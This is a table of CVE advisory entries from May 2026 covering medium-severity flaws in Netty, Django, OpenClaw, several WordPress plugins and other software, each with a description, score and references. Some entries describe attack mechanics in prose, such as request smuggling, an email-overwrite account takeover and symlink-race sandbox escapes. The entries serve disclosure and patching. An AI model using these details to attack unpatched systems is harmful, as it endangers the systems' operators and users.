| netty--netty | Netty allows request-line validation to be bypassed when a `DefaultHttpRequest` or `DefaultFullHttpRequest` is created first and its URI is later changed via `setUri()`. The constructors reject CRLF and whitespace characters that would break the start-line, but `setUri()` does not apply the same validation. `HttpRequestEncoder` and `RtspEncoder` then write the URI into the request line verbatim. If attacker-controlled input reaches `setUri()`, this enables CRLF injection and insertion of additional HTTP or RTSP requests, leading to HTTP request smuggling or desynchronization on the HTTP side and request injection on the RTSP side. This issue is fixed in versions 4.2.13.Final and 4.1.133.Final. | 2026-05-06 | 5.3 | CVE-2026-41417 | https://github.com/netty/netty/security/advisories/GHSA-v8h7-rr48-vmmv |
| open-telemetry--opentelemetry-dotnet-contrib | OpenTelemetry.Resources.Azure is the .NET resource detector for Azure environments. In versions 1.15.0-beta.1 and earlier, the AzureVmMetaDataRequestor class makes HTTP requests to the Azure VM instance metadata service and reads the response body into memory without any size limit. An attacker who controls the configured endpoint, or who can intercept traffic to it via a man-in-the-middle attack, can return an arbitrarily large response body. This causes unbounded heap allocation in the consuming process, leading to high transient memory pressure, garbage-collection stalls, or an OutOfMemoryException that terminates the process. As a workaround, disable the Azure VM resource detector or use network-level controls such as firewall rules, mTLS, or a service mesh to prevent man-in-the-middle attacks on the Azure VM instance metadata endpoint. This issue is fixed in version 1.15.1-beta.1, which streams responses rather than buffering them entirely in memory and ignores responses larger than 4 MiB. | 2026-05-06 | 5.9 | CVE-2026-41483 | https://github.com/open-telemetry/opentelemetry-dotnet-contrib/security/advisories/GHSA-vc24-j8c5-2vw4 https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4121 |
| open-telemetry--opentelemetry-dotnet-contrib | OpenTelemetry.Exporter.OneCollector is a .NET exporter that sends telemetry to a OneCollector back-end over HTTP. In versions 1.15.0 and earlier, when a request to the configured back-end or collector results in an unsuccessful HTTP 4xx or 5xx response, the HttpJsonPostTransport class reads the entire response body into memory with no upper bound on the number of bytes consumed in order to include the error response in operator logs. An attacker who controls the configured endpoint, or who can intercept traffic to it via a man-in-the-middle attack, can return an arbitrarily large response body. This causes unbounded heap allocation in the consuming process, leading to high transient memory pressure, garbage-collection stalls, or an OutOfMemoryException that terminates the process. As a workaround, use network-level controls such as firewall rules, mTLS, or a service mesh to prevent man-in-the-middle attacks on the configured back-end or collector endpoint. This issue is fixed in version 1.15.1, which limits the number of bytes read from the response body in an error condition to 4 MiB. | 2026-05-06 | 5.3 | CVE-2026-41484 | https://github.com/open-telemetry/opentelemetry-dotnet-contrib/security/advisories/GHSA-55m9-299j-53c7 https://github.com/open-telemetry/opentelemetry-dotnet-contrib/pull/4117 |
| czlonkowski--n8n-mcp | n8n-MCP is an MCP server that provides AI assistants access to n8n node documentation, properties, and operations. Prior to version 2.47.11, when n8n-mcp runs in HTTP transport mode, incoming requests to the POST /mcp endpoint had their request metadata written to server logs regardless of the authentication outcome. In deployments where logs are collected, forwarded to external systems, or viewable outside the request trust boundary (shared log storage, SIEM pipelines, support/ops access), this can disclose bearer tokens from the Authorization header, per-tenant API keys from the x-n8n-key header in multi-tenant setups, and JSON-RPC request payloads sent to the MCP endpoint. Access control itself was not bypassed (unauthenticated requests were correctly rejected with 401 Unauthorized), but sensitive values from those rejected requests could still be persisted in logs. This issue has been patched in version 2.47.11. | 2026-05-08 | 5.3 | CVE-2026-41495 | https://github.com/czlonkowski/n8n-mcp/security/advisories/GHSA-pfm2-2mhg-8wpx https://github.com/czlonkowski/n8n-mcp/releases/tag/v2.47.11 |
| enchant97--note-mark | Note Mark is an open-source note-taking application. Prior to version 0.19.3, after a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw "JOIN books ..." clauses used by the note and asset queries. This issue has been patched in version 0.19.3. | 2026-05-04 | 5.3 | CVE-2026-41572 | https://github.com/enchant97/note-mark/security/advisories/GHSA-3gr9-485j-v4xf https://github.com/enchant97/note-mark/releases/tag/v0.19.3 |
| projectdiscovery--nuclei | Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response data containing helper/function syntax gets reused by multi-step templates. If the -env-vars / -ev option is explicitly enabled, this can expose host environment variables. That option is off by default, so standard configurations are not affected by the information disclosure risk. This issue has been patched in version 3.8.0. | 2026-05-08 | 5.3 | CVE-2026-41645 | https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-jm34-66cf-qpvr https://github.com/projectdiscovery/nuclei/pull/7221 https://github.com/projectdiscovery/nuclei/pull/7321 https://github.com/projectdiscovery/nuclei/commit/6c803c74d193f85f8a6d9803ce493fd302cad0eb https://github.com/projectdiscovery/nuclei/commit/d2217320162d5782ca7cb95bef9dda17063818f3 https://github.com/projectdiscovery/nuclei/releases/tag/v3.8.0 |
| projectdiscovery--nuclei | Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's JavaScript protocol runtime allows JavaScript templates to read local .js and .json files through the require() function, bypassing the default local file access restriction. This issue has been patched in version 3.8.0. | 2026-05-08 | 5.5 | CVE-2026-41646 | https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-29rg-wmcw-hpf4 https://github.com/projectdiscovery/nuclei/pull/7332 https://github.com/projectdiscovery/nuclei/commit/6f2ade6a9b427c284c15a43445f9c7f055e60e5d |
| Admidio--admidio | Admidio is an open-source user management solution. Prior to version 5.0.9, Role::stopMembership() does not verify whether removing a user from the administrator role leaves zero administrators. The deprecated Membership::stopMembership() contains this safety check, but the current code path bypasses it. Any administrator can remove the last remaining other administrator, locking the entire system out of administrative access. The exploit does not require concurrent requests; sequential removals produce the same result. This issue has been patched in version 5.0.9. | 2026-05-07 | 5.2 | CVE-2026-41662 | https://github.com/Admidio/admidio/security/advisories/GHSA-c7xm-r6vj-8vg6 https://github.com/Admidio/admidio/releases/tag/v5.0.9 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, a user holding the PERM_EDIT_USERS permission (intended for general user-profile editing) can read and modify the notification subscriptions of any other user, including admins, by sending a single POST request. This is a sibling of CVE-2025-48472's notification authorization bypass - the prior fix did not cover this code path. A non-admin attacker can silently disable an admin's email/browser/mobile notifications, suppressing security alerts and conversation-assignment notices. This issue has been patched in version 1.8.217. | 2026-05-07 | 5.4 | CVE-2026-41903 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-f489-qxv6-gvgg https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| givanz--Vvveb | Vvveb before 1.0.8.2 contains an information disclosure vulnerability in the cron controller that allows unauthenticated attackers to retrieve the application's secret cron key. Attackers can access the cron controller without authentication and retrieve the exposed secret key from the response, enabling them to trigger scheduled task execution outside of the intended schedule. | 2026-05-07 | 5.3 | CVE-2026-41928 | https://github.com/givanz/Vvveb/commit/517bc09faf44136e72de391aacc8b90a706f7ae7 https://www.vulncheck.com/advisories/vvveb-information-disclosure-via-cron-controller |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains an information disclosure vulnerability that allows unauthenticated attackers to obtain sensitive server information by triggering unhandled exceptions in the password-reset module. Attackers can access the admin password-reset endpoint to trigger a fatal error caused by a missing namespace import, which exposes the absolute server file path, internal class namespaces, line numbers, and source code excerpts through the debug exception handler rendered to unauthenticated requests. | 2026-05-06 | 5.3 | CVE-2026-41931 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-xgvg-r47g-786r https://www.vulncheck.com/advisories/vvveb-information-disclosure-via-debug-exception-handler |
| novafacile--novagallery | novaGallery is a php image gallery. Prior to version 2.1.1, a path traversal vulnerability has been identified in novaGallery. This allows unauthenticated users to read image files outside the intended gallery root directory. This issue has been patched in version 2.1.1. | 2026-05-08 | 5.3 | CVE-2026-42028 | https://github.com/novafacile/novagallery/security/advisories/GHSA-wv5j-98c7-frm9 https://github.com/novafacile/novagallery/commit/46fe7b0f79f429e18c8cff3f92360c4513732ba6 https://github.com/novafacile/novagallery/releases/tag/v2.1.1 |
| EvoMap--evolver | Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a prototype pollution vulnerability in the mailbox store module allows attackers to modify the behavior of all JavaScript objects by injecting malicious properties into Object.prototype. The vulnerability exists in the _applyUpdate() and _updateRecord() functions which use Object.assign() to merge user-controlled data without filtering dangerous keys like __proto__, constructor, or prototype. This issue has been patched in version 1.69.3. | 2026-05-04 | 5.2 | CVE-2026-42077 | https://github.com/EvoMap/evolver/security/advisories/GHSA-2cjr-5v3h-v2w4 https://github.com/EvoMap/evolver/releases/tag/v1.69.3 |
| GreycLab--CImg | CImg Library is a C++ library for image processing. Prior to commit c3aacf5, the nb_colors field read from the BMP file header is used directly to compute an allocation size without validating it against the remaining file size. A crafted BMP file with a large nb_colors value triggers an out-of-memory condition, crashing any application that uses CImg to load untrusted BMP files. This issue has been patched via commit c3aacf5. | 2026-05-04 | 5.5 | CVE-2026-42146 | https://github.com/GreycLab/CImg/security/advisories/GHSA-g54r-qmgx-c6fv https://github.com/GreycLab/CImg/issues/477 https://github.com/GreycLab/CImg/commit/c3aacf5b96ac1e54b7af1957c6737dbf3949f6d3 https://github.com/GreycLab/CImg/releases/tag/v.3.7.5 |
| WeblateOrg--wlc | wlc is a Weblate command-line client using Weblate's REST API. Prior to version 2.0.0, the HTML output format in wlc embeds API response data into HTML without escaping, allowing cross-site scripting when the output is rendered in a browser. This issue has been patched in version 2.0.0. | 2026-05-08 | 5.1 | CVE-2026-42150 | https://github.com/WeblateOrg/wlc/security/advisories/GHSA-gx2m-mcc2-r4p3 https://github.com/WeblateOrg/wlc/pull/1327 https://github.com/WeblateOrg/wlc/commit/0f3e58f6d7457b05d48ef40f579a172c4c8b8469 https://github.com/WeblateOrg/wlc/releases/tag/2.0.0 |
| suitenumerique--people | People is an application to handle users and teams, and distribute permissions across La Suite. Prior to version 1.25.0, a user holding the Administrator role on a mail domain could send a crafted invitation request to promote any existing user (including users with no current domain access) to the Owner role. The exploit requires a single authenticated HTTP request and grants full domain ownership immediately, without any acceptance step from the target. This issue has been patched in version 1.25.0. | 2026-05-08 | 5.5 | CVE-2026-42185 | https://github.com/suitenumerique/people/security/advisories/GHSA-42cf-rv2h-v8rf https://github.com/suitenumerique/people/commit/6a51b96d8e907483fa8fc489d8714cc35fb4099b https://github.com/suitenumerique/people/releases/tag/v1.25.0 |
| redwoodjs--sdk | RedwoodSDK is a server-first React framework. From version 1.0.0-beta.50 to before version 1.2.3, server actions in rwsdk apply HTTP method enforcement but no origin validation. A request originating from a different origin that the browser treats as same-site can invoke a server action with the victim's session cookie attached. This issue has been patched in version 1.2.3. | 2026-05-08 | 5.3 | CVE-2026-42190 | https://github.com/redwoodjs/sdk/security/advisories/GHSA-m2m6-cff5-3w7c https://github.com/redwoodjs/sdk/releases/tag/v1.2.3 |
| useplunk--plunk | Plunk is an open-source email platform built on top of AWS SES. Prior to version 0.9.0, a stored cross-site scripting (XSS) vulnerability exists in the campaign management feature, where the email body content created by authenticated project members is stored and later rendered in the admin dashboard using React's dangerouslySetInnerHTML without any HTML sanitization. This allows a lower-privileged member to embed malicious scripts in a campaign's email body that execute in the context of any admin or other member who views the campaign, potentially enabling session hijacking or unauthorized actions on their behalf. This issue has been patched in version 0.9.0. | 2026-05-08 | 5.4 | CVE-2026-42192 | https://github.com/useplunk/plunk/security/advisories/GHSA-mjqc-qrv3-24hq https://github.com/useplunk/plunk/releases/tag/v0.9.0 |
| G-Research--ParquetSharp | ParquetSharp is a .NET library for reading and writing Apache Parquet files. From version 18.1.0 to before version 23.0.0.1, DecimalConverter.ReadDecimal performs a stackalloc whose size is derived from a value that may be attacker-supplied. If an attacker declares a decimal column with an unreasonable width, this can lead to a stack overflow, which in a service environment could take down the service. This affects applications using ParquetSharp to read untrusted Parquet files in a network service. This issue has been patched in version 23.0.0.1. | 2026-05-07 | 5.3 | CVE-2026-42241 | https://github.com/G-Research/ParquetSharp/security/advisories/GHSA-rrjr-v56m-ww88 https://github.com/G-Research/ParquetSharp/releases/tag/23.0.0.1 |
| solidtime-io--solidtime | solidtime is an open-source time-tracking app. In version 0.12.0, the PUT /api/v1/organizations/{organization}/time-entries/{timeEntry} API accepts a route-bound timeEntry from another organization when the caller has time-entries:update:all in the URL organization, allowing a known foreign time-entry UUID to be modified and rebound to objects in the caller's organization. This issue has been patched in version 0.12.1. | 2026-05-08 | 5.8 | CVE-2026-42279 | https://github.com/solidtime-io/solidtime/security/advisories/GHSA-pmf9-pxq9-ccwr https://github.com/solidtime-io/solidtime/commit/b73aa543fdf5b61c37447307ab7277451296832c https://github.com/solidtime-io/solidtime/releases/tag/v0.12.1 |
| OpenStack--Horizon | An issue was discovered in OpenStack Horizon 25.6 and 25.7 before 25.7.3. There is a write operation to the session storage backend before authentication and thus storage can be exhausted by unauthenticated requests. This is a regression of the CVE-2014-8124 fix. | 2026-05-05 | 5.3 | CVE-2026-43002 | https://bugs.launchpad.net/horizon/+bug/2150331 https://www.openwall.com/lists/oss-security/2026/05/05/7 https://security.openstack.org/ossa/OSSA-2026-009.html |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.10 before 2026.4.14 contain a missing authorization vulnerability in the Microsoft Teams SSO invoke handler that fails to apply sender allowlist checks. Attackers can bypass sender authorization by sending SSO invoke requests that are processed without proper validation, allowing unauthorized access to Teams SSO signin functionality. | 2026-05-05 | 5.3 | CVE-2026-43572 | GitHub Security Advisory (GHSA-gc9r-867r-j85f) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.10 < 2026.4.14 - Missing Sender Authorization in Microsoft Teams SSO Invoke Handler |
| OpenClaw--OpenClaw | OpenClaw versions 2026.4.10 before 2026.4.14 fail to persist session context during delivery queue recovery for media replay. Attackers can exploit recovered queued outbound media to bypass group tool policy enforcement and weaken channel media restrictions after service restart or recovery. | 2026-05-06 | 5.3 | CVE-2026-43583 | GitHub Security Advisory (GHSA-r77c-2cmr-7p47) Patch Commit VulnCheck Advisory: OpenClaw 2026.4.10 < 2026.4.14 - Loss of Group Tool-Policy Context in Delivery Queue Recovery |
| electerm--electerm | electerm is an open-source terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. In versions 3.8.15 and prior, the getConstants() IPC handler in src/app/lib/ipc-sync.js serialises the entire process.env object and sends it to the renderer. The data is stored as window.pre.env and is accessible from any JavaScript running in the renderer (e.g., via the DevTools console or a compromised webview context). An attacker who achieves any JavaScript execution within the renderer can trivially exfiltrate any credentials held in environment variables to a remote server, leading to cloud account compromise, supply chain attacks, and lateral movement. At time of publication, there are no publicly available patches. | 2026-05-08 | 5.5 | CVE-2026-43942 | https://github.com/electerm/electerm/security/advisories/GHSA-37j4-88rp-2f6h |
| NixOS--Nix | An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via "nix-prefetch-url --unpack" or "nix store prefetch-file --unpack" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7); | 2026-05-05 | 5.3 | CVE-2026-44029 | https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407 https://www.openwall.com/lists/oss-security/2026/05/04/33 https://github.com/NixOS/nix/security/advisories/GHSA-gr92-w2r5-qw5p |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a time-of-check/time-of-use race condition in OpenShell sandbox filesystem writes that allows attackers to redirect writes outside the intended mount root. Attackers can exploit symlink swaps during filesystem operations to bypass sandbox restrictions and write files outside the local mount root. | 2026-05-06 | 5.3 | CVE-2026-44112 | GitHub Security Advisory (GHSA-wppj-c6mr-83jj) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Symlink Swap Race Condition in OpenShell FS Bridge Writes |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.22 contains a time-of-check/time-of-use race condition in the OpenShell filesystem bridge that allows attackers to read files outside the intended mount root. Attackers can exploit symlink swaps during filesystem operations to bypass sandbox restrictions and access unauthorized file contents. | 2026-05-06 | 5.3 | CVE-2026-44113 | GitHub Security Advisory (GHSA-5h3g-6xhh-rg6p) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.22 - Time-of-Check/Time-of-Use Race Condition in OpenShell FS Bridge |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.20 contains a server-side request forgery vulnerability in QQBot direct media upload that skips URL validation. Attackers can bypass SSRF protections by sending crafted image URLs to uploadC2CMedia and uploadGroupMedia endpoints to relay unintended requests. | 2026-05-06 | 5.8 | CVE-2026-44117 | GitHub Security Advisory (GHSA-c4qg-j8jg-42q5) Patch Commit VulnCheck Advisory: OpenClaw < 2026.4.20 - Server-Side Request Forgery in QQBot Direct Media Upload |
| ZTE--ZXCLOUD iRAI | ZTE Cloud PC client uSmartView contains a DLL hijacking vulnerability; since uSmartViewServiceAgent.exe runs with SYSTEM privileges, successful hijacking enables local arbitrary code execution, privilege escalation, and memory corruption. | 2026-05-07 | 5.7 | CVE-2026-44406 | https://support.zte.com.cn/zte-iccp-isupport-webui/bulletin/detail/8107253322107965601 |
| ZcashFoundation--zebra | ZEBRA is a Zcash node written entirely in Rust. Prior to zebrad version 4.4.0, prior to zebra-chain version 7.0.0, and prior to zebra-network version 6.0.0, several inbound deserialization paths in Zebra allocated buffers sized against generic transport or block-size ceilings before the tighter protocol or consensus limits were enforced. An unauthenticated or post-handshake peer could therefore force the node to preallocate and parse for orders of magnitude more data than the protocol intended, across headers messages, equihash solutions in block headers, Sapling spend vectors in V5/V4 transactions, and coinbase script bytes in blocks. This issue has been patched in zebrad version 4.4.0, zebra-chain version 7.0.0, and zebra-network version 6.0.0. | 2026-05-08 | 5.3 | CVE-2026-44500 | https://github.com/ZcashFoundation/zebra/security/advisories/GHSA-438q-jx8f-cccv |
| publishpress--Schedule Post Changes With PublishPress Future: Unpublish, Delete, Change Status, Trash, Change Categories | The Schedule Post Changes With PublishPress Future plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wrapper' attribute of the [futureaction] shortcode in all versions up to, and including, 4.10.0. This is due to insufficient input sanitization on the wrapper attribute. The plugin uses esc_html() to escape the value, but esc_html() only encodes HTML entities and does not prevent attribute injection when the value is used as an HTML tag name in a sprintf() call. An attacker can inject event handler attributes via spaces in the wrapper value. This makes it possible for authenticated attackers, with administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Since it is also possible for administrators to make this functionality available to lower-privileged users, this introduces the possibility of abuse by contributors. | 2026-05-05 | 5.5 | CVE-2026-5247 | https://www.wordfence.com/threat-intel/vulnerabilities/id/9acf80aa-8354-4430-9836-18fa17854521?source=cve https://plugins.trac.wordpress.org/browser/post-expirator/trunk/src/Modules/Expirator/Controllers/ShortcodeController.php#L173 https://plugins.trac.wordpress.org/browser/post-expirator/tags/4.9.4/src/Modules/Expirator/Controllers/ShortcodeController.php#L173 https://github.com/publishpress/publishpress-future/releases |
| djangoproject--Django | An issue was discovered in Django 6.0 before 6.0.5 and 5.2 before 5.2.14. ASGI requests with a missing or understated `Content-Length` header can bypass the `FILE_UPLOAD_MAX_MEMORY_SIZE` limit, potentially loading large files into memory and causing service degradation. As a reminder, Django expects a limit to be configured at the web server level rather than solely relying on `FILE_UPLOAD_MAX_MEMORY_SIZE`. Earlier, unsupported Django series (such as 5.0.x, 4.1.x, and 3.2.x) were not evaluated and may also be affected. Django would like to thank Kyle Agronick for reporting this issue. | 2026-05-05 | 5.3 | CVE-2026-5766 | Django security archive Django releases announcements Django security releases issued: 6.0.5 and 5.2.14 |
| wpmudev--Forminator Forms Contact Form, Payment Form & Custom Form Builder | The Forminator Forms plugin for WordPress is vulnerable to Missing Authorization in versions up to and including 1.51.1. This is due to the `processRequest()` method in `Forminator_Admin_Module_Edit_Page` (admin/abstracts/class-admin-module-edit-page.php) dispatching sensitive module-management actions - including export, delete, clone, delete-entries, publish/draft, and bulk variants - after only a nonce check, without ever verifying that the current user holds the `manage_forminator_modules` capability. The nonce used (`forminator_form_request`) is unconditionally embedded in the global `forminatorData` JavaScript object and localized on every Forminator admin page, including Templates and Reports pages accessible to users who explicitly lack module-management permissions. Because `processRequest()` is invoked during the `admin_menu` action hook - which fires before WordPress enforces page-level capability checks - a user whose Forminator role is restricted to Templates or Reports can craft a valid POST request targeting any published module and successfully trigger the vulnerable actions. This makes it possible for authenticated attackers with subscriber-level access (or any custom low-privilege Forminator role) to export the complete internal configuration of arbitrary forms/polls/quizzes (including notification routing, integration credentials, and conditional logic), delete modules, delete all submissions/votes, clone modules, or bulk-change publish/draft status. | 2026-05-07 | 5.3 | CVE-2026-6222 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e860aa70-b8ef-4b2a-a035-b01efce30a79?source=cve https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L1008 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L1008 https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/abstracts/class-admin-module-edit-page.php#L951 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/abstracts/class-admin-module-edit-page.php#L951 https://plugins.trac.wordpress.org/browser/forminator/trunk/admin/classes/class-admin-data.php#L141 https://plugins.trac.wordpress.org/browser/forminator/tags/1.51.1/admin/classes/class-admin-data.php#L141 https://plugins.trac.wordpress.org/browser/forminator/tags/1.52/admin/abstracts/class-admin-module-edit-page.php#L988 |
| www[.]pgbouncer[.]org--PgBouncer | A possible null pointer dereference in PgBouncer before 1.25.2 could lead to a crash if a server sends an error response without a SQLSTATE field. | 2026-05-09 | 5.9 | CVE-2026-6666 | https://www.pgbouncer.org/changelog.html#pgbouncer-125x |
| Velocidex--velociraptor | An authorization bypass (CWE-639) in the GetUserRoles gRPC API endpoint in Velocidex Velociraptor below version 0.76.5 allows any authenticated low-privilege user to retrieve the complete ACL policy (roles and permissions) for any user across all organizations by supplying targeted Name and Org parameters via a network request. | 2026-05-06 | 5 | CVE-2026-7573 | https://docs.velociraptor.app/announcements/advisories/cve-2026-7573/ |
| latepoint--LatePoint Calendar Booking Plugin for Appointments and Events | The LatePoint plugin for WordPress is vulnerable to Account Takeover via Weak Password Recovery Mechanism in the unauthenticated guest booking flow in versions up to, and including, 5.5.0. This is due to the save_connected_wordpress_user() function propagating a LatePoint customer's email address to its linked WordPress user account via wp_update_user() without any ownership verification, combined with the guest booking flow's ability to overwrite an existing customer's email through phone-based merge without authentication. This makes it possible for unauthenticated attackers to overwrite the email address of a non-super-admin WordPress user account that is not yet linked to a LatePoint customer, enabling full account takeover by subsequently triggering the standard WordPress password-reset flow to the attacker-controlled address, provided the plugin is configured with WordPress user integration enabled, phone-based contact merging, and customer authentication disabled. Administrator accounts on single-site installs are not affected. | 2026-05-09 | 5.3 | CVE-2026-7652 | https://www.wordfence.com/threat-intel/vulnerabilities/id/bdaa32cd-a148-4554-9fd5-f5b0a5b2d1c3?source=cve https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/lib/helpers/steps_helper.php#L1940 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/lib/helpers/customer_helper.php#L238 https://plugins.trac.wordpress.org/browser/latepoint/trunk/latepoint.php#L1165 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/latepoint.php#L1165 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/steps_helper.php#L1972 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/steps_helper.php#L1972 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/steps_helper.php#L1940 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/steps_helper.php#L1940 https://plugins.trac.wordpress.org/browser/latepoint/trunk/lib/helpers/customer_helper.php#L238 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.5.0/lib/helpers/customer_helper.php#L238 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/latepoint.php#L1165 https://plugins.trac.wordpress.org/browser/latepoint/tags/5.4.2/lib/helpers/steps_helper.php#L1972 https://plugins.trac.wordpress.org/changeset/3522933/latepoint/trunk/latepoint.php https://plugins.trac.wordpress.org/changeset?old_path=%2Flatepoint/tags/5.5.0&new_path=%2Flatepoint/tags/5.5.1 |
| PrefectHQ--prefect | A vulnerability was detected in PrefectHQ prefect up to 3.6.21. This impacts the function endswith of the file /api/health of the component Health Check API. Performing a manipulation results in improper authentication. The attack can be carried out remotely. The exploit is now public and may be used. Upgrading to version 3.6.22 will fix this issue. The patch is named e21617125335025b4b27e7d6f0ca028e8e8f3b79. Upgrading the affected component is recommended. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 5.3 | CVE-2026-7722 | VDB-360898 | PrefectHQ prefect Health Check API health endswith improper authentication VDB-360898 | CTI Indicators (IOB, IOC, IOA) Submit #807255 | PrefectHQ Perfect <=3.6.21 Improper Authentication https://gist.github.com/nedlir/f576abbb0e491dc9bb7e106c140dda04 https://github.com/PrefectHQ/prefect/pull/21063 https://github.com/PrefectHQ/prefect/commit/e21617125335025b4b27e7d6f0ca028e8e8f3b79 https://github.com/PrefectHQ/prefect/releases/tag/3.6.22 https://github.com/PrefectHQ/prefect/ |
| PrefectHQ--prefect | A vulnerability has been found in PrefectHQ prefect up to 3.6.28.dev1. Affected by this vulnerability is the function validate_restricted_url of the component Webhook/Notification. The manipulation leads to time-of-check time-of-use. It is possible to initiate the attack remotely. The attack is considered to have high complexity. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 3.6.28.dev2 addresses this issue. The identifier of the patch is 7c70ac54a5e101431d83b9f2681ec88d5e0021ed. Upgrading the affected component is advised. The vendor was contacted early, responded in a very professional manner and quickly released a fixed version of the affected product. | 2026-05-04 | 5 | CVE-2026-7724 | VDB-360900 | PrefectHQ prefect Webhook/Notification validate_restricted_url toctou VDB-360900 | CTI Indicators (IOB, IOC, IOA) Submit #807303 | PerfectHQ Perfect >=3.6.26 Time-of-check Time-of-use https://linear.app/prefect/issue/OSS-7874/fix-dns-rebinding-toctou-bypass-in-validate-restricted-url https://github.com/PrefectHQ/prefect/pull/21591 https://gist.github.com/nedlir/fa99777e8989414585d08c3625bf044a https://github.com/PrefectHQ/prefect/commit/7c70ac54a5e101431d83b9f2681ec88d5e0021ed https://github.com/PrefectHQ/prefect/releases/tag/3.6.28.dev2 https://github.com/PrefectHQ/prefect/ |
| osrg--GoBGP | A vulnerability has been found in osrg GoBGP up to 4.3.0. This impacts the function SRv6L3ServiceAttribute.DecodeFromBytes of the file pkg/packet/bgp/prefix_sid.go of the component SRv6 L3 Service. Such manipulation of the argument data leads to denial of service. The attack may be performed from remote. Upgrading to version 4.4.0 will fix this issue. The name of the patch is f9f7b55ec258e514be0264871fa645a2c3edad11. You should upgrade the affected component. | 2026-05-04 | 5.3 | CVE-2026-7734 | VDB-360909 | osrg GoBGP SRv6 L3 Service prefix_sid.go SRv6L3ServiceAttribute.DecodeFromBytes denial of service VDB-360909 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #807581 | GoBGP 4.3.0 Infinite Loop https://github.com/osrg/gobgp/commit/f9f7b55ec258e514be0264871fa645a2c3edad11 https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| osrg--GoBGP | A vulnerability was identified in osrg GoBGP up to 4.3.0. Affected by this issue is the function BMPPeerUpNotification.ParseBody/BMPStatisticsReport.ParseBody of the file pkg/packet/bmp/bmp.go of the component BMP Parser. The manipulation leads to out-of-bounds read. The attack can be initiated remotely. Upgrading to version 4.4.0 can resolve this issue. The identifier of the patch is bc77597d42335c78464bc8e15a471d887bbdf260. Upgrading the affected component is recommended. | 2026-05-04 | 5.3 | CVE-2026-7737 | VDB-360912 | osrg GoBGP BMP Parser bmp.go BMPStatisticsReport.ParseBody out-of-bounds VDB-360912 | CTI Indicators (IOB, IOC, IOA) Submit #807605 | osrg GoBGP <= 4.3.0 Out-of-Bounds Read https://github.com/osrg/gobgp/commit/bc77597d42335c78464bc8e15a471d887bbdf260 https://github.com/osrg/gobgp/releases/tag/v4.4.0 https://github.com/osrg/gobgp/ |
| runZero--Platform | An issue that could allow a dashboard configuration to be viewed from outside of the authorized organization scope has been resolved. This is an instance of CWE-269: Improper Privilege Management, and has an estimated CVSS score of CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N (5.0, Medium). This issue was fixed in version v4.0.260416.0 of the runZero Platform. | 2026-05-05 | 5 | CVE-2026-7778 | https://www.runzero.com/advisories/runzero-platform-dashboard-configuration-exposure-cve-2026-7778/ https://help.runzero.com/docs/release-notes/#402604160 |
